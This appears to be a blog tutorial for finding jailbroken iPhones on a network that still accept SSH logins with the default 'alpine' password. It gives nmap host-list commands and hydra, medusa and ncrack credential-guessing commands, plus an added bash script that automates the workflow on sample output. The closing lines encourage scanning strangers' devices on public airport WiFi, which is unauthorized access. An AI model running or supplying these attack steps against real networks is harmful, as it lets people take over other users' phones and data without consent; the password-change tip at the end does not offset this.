After jailbreaking, most users install OpenSSH on their iOS device. However, some of them do not know about, or simply forget to change, the default password. Below is the user list of an iPhone:
The default password for both the root and mobile accounts is “alpine”.
So our goal is to scan a whole subnet and find out whether any jailbroken iOS devices on it accept an SSH login with the default username and password.
Tools: nmap (v7.01), hydra (v8.1) or medusa (v2.2) or ncrack (v0.4ALPHA).
1. Connect your computer to the wireless network and find out the IP range: 192.168.1.9/24.
2. Use nmap to generate a host list: nmap -sL -n 192.168.1.9/24 | grep "Nmap scan report" | awk '{print $NF}' > hosts.lst
   The -n skips reverse DNS. Without it, a host whose name resolves is printed as "Nmap scan report for name (ip)", so the last field becomes "(ip)" with parentheses, which the crackers cannot use as a target.
3. Or, if you only want to scan the live hosts, use: nmap -sP -n 192.168.1.9/24 | grep "Nmap scan report" | awk '{print $NF}' > liveHosts.lst
   (-sP is the old name of the ping scan; nmap 7 still accepts it but calls it -sn.)
4. Create 2 text files, username.txt (root, mobile) and password.txt (alpine).
5. Run: hydra -t 4 -L username.txt -P password.txt -M hosts.lst -s 22 ssh
6. It took 12 minutes to get the password:
7. Or you can use medusa: medusa -H liveHosts.lst -U username.txt -P password.txt -M ssh
8. Ncrack can also do the job: ncrack -p ssh -U username.txt -P password.txt -iL liveHosts.lst --exclude 192.168.1.9
   (192.168.1.9 is the scanning machine's own address from step 1.) You can press 'p' to list the discovered credentials while the scan is running.
Following the steps above, you can easily modify the username and password files to perform a dictionary or brute-force attack.
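The procedure above, put into a small script. This is an added example and not code from the original post: it wraps the host-list, wordlist and hydra steps in reusable functions and runs them on constructed sample nmap and hydra output embedded in the script, so it works offline; the function names, the sample data and the hydra -o output file are my own choices, not the author's.

```bash
#!/usr/bin/env bash
# Added example (not from the original post). Runs on constructed sample
# output so it works offline; swap the samples for real nmap/hydra output
# on a network you are authorized to test.
set -eu

# Turn "nmap -sL" / "nmap -sn" output into one IP per line. When reverse DNS
# resolves, nmap prints "Nmap scan report for name (192.168.1.5)" and the last
# field is "(192.168.1.5)", so the parentheses are stripped; a plain
# awk '{print $NF}' would leave them in and the crackers would treat
# "(192.168.1.5)" as a hostname.
nmap_hosts() {
  grep 'Nmap scan report for' | awk '{ ip = $NF; gsub(/[()]/, "", ip); print ip }'
}

# Write the wordlists used by hydra/medusa/ncrack: the two iOS accounts
# and their shared default password.
write_wordlists() {
  printf '%s\n' root mobile > "$1/username.txt"
  printf '%s\n' alpine > "$1/password.txt"
}

# Run hydra against a host list (only if hydra is installed) and save its
# results with -o so they can be parsed afterwards.
hydra_scan() {
  dir="$1"; hosts="$2"; out="$3"
  command -v hydra >/dev/null || { echo "hydra not installed" >&2; return 1; }
  hydra -t 4 -L "$dir/username.txt" -P "$dir/password.txt" -M "$hosts" -s 22 -o "$out" ssh
}

# Reduce hydra's result lines, e.g.
#   [22][ssh] host: 192.168.1.23   login: root   password: alpine
# to "ip login password" triples, one per hit.
hydra_hits() {
  awk '/^\[22\]\[ssh\] host:/ { print $3, $5, $7 }'
}

# Constructed sample data; no scan was run to produce it.
SAMPLE_NMAP='Starting Nmap 7.01 ( https://nmap.org )
Nmap scan report for 192.168.1.1
Host is up (0.0020s latency).
Nmap scan report for printer.lan (192.168.1.5)
Host is up (0.010s latency).
Nmap scan report for 192.168.1.23
Host is up (0.050s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.50 seconds'

SAMPLE_HYDRA='[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.23   login: root   password: alpine
[22][ssh] host: 192.168.1.23   login: mobile   password: alpine
1 of 3 targets successfully completed, 2 valid passwords found'

main() {
  work="$(mktemp -d)"
  printf '%s\n' "$SAMPLE_NMAP" | nmap_hosts > "$work/liveHosts.lst"
  write_wordlists "$work"
  echo "targets:"; cat "$work/liveHosts.lst"
  # On a real engagement, replace the sample with:
  #   hydra_scan "$work" "$work/liveHosts.lst" "$work/hydra.out"
  #   hydra_hits < "$work/hydra.out"
  echo "default-credential hits (from sample hydra output):"
  printf '%s\n' "$SAMPLE_HYDRA" | hydra_hits
  rm -rf "$work"
}
main
```

For a real run, feed `nmap -sn -n 192.168.1.0/24` into `nmap_hosts` instead of the sample, and pass the resulting list to `hydra_scan`; the `hydra_hits` filter then gives you a clean "ip user password" list to hand to whoever owns the devices.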
Ok, that’s it. Next time you go to an airport, connect your Kali Linux to the free WiFi, have a cup of coffee and scan the whole subnet. You might be surprised.
BTW, to change the passwords, just SSH into the iPhone as root and run “passwd” (for root) and “passwd mobile”.